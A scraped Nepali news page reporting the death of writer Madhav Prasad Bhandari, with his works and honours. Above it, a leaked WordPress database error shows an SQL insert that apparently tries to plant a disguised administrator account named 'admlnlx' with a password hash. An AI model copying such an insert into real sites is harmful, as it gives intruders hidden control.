WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJVquYpSB..pSmCmTB8ZF/rlwe/cYr0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 08:26:22', '', 'admlnlx', 'admlnlx')

वरिष्ठ साहित्यकार भडारीको निधन – Gaule Khabar

वरिष्ठ साहित्यकार भडारीको निधन

वरिष्ठ साहित्यकार भडारीको निधन

काठमाण्डौ । वरिष्ठ साहित्यकार माधवप्रसाद भडारीको मृत्यु भएको छ । हाल काठमाडौँमा बस्दै आउनुभएका इलाम नगरपालिका–२ सुम्बेक निवासी उहाँको ८६ वर्षको उमेरमा आज काठमाडौँ लुबुस्थित आफ्नै घरमा मृत्यु भएको पारिवारिक स्रोतले जनाएकोे छ । स्व भडारीको आजै पशुपतिस्थित आर्यघाटमा दाहसंस्कार गरिने जनाएको छ । उहाँका ‘नेपाली कथा’ २०१, ‘गाउँघर कथा’ २०१५, ‘सुन्दर अलङ्कार’ २०१८ ९सहलेखन०, ‘जन्मघर नाटक’ २०२८, ‘हाम्रो साहित्य र साहित्यकार’ २०२८ निबन्ध लेखन, ‘पूर्णिमा उपन्यास’ २०३०, ‘आमाको आकाङ्क्षा’ २०३६ ‘माधव भडारीका कथा’ २०४०, ‘नबिर्सिने कोशेली’ २०६१ लगायत दर्जनाँै चर्चित कृति तथा सङ्ग्रह प्रकाशित भएकोे साहित्यकार राधेश्याम लेकालीले जानकारी दिए ।

साहित्यिक पत्रकार सङ्घबाट प्रदान गरिने मैनाली कथा पुरस्कारबाट २०५८ सालमा पुरस्कृत हुनुभएको भडारी महानन्द पुरस्कार, प्रबल गोरखा दक्षिणबाहु चौथो आदिबाट सम्मानित भइसक्नुभएको साहित्यकार राधेश्याम लेकालीले जानकारी दिए । स्व भडारीलाई इलाम संस्कृति प्रतिष्ठानले अभिनन्दनसमेत गरिसकेको छ । आफ्नो थर भडारी लेख्नुभएकाले उहाँका परिवारले समेत भडारी नै लेख्ने गरेका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका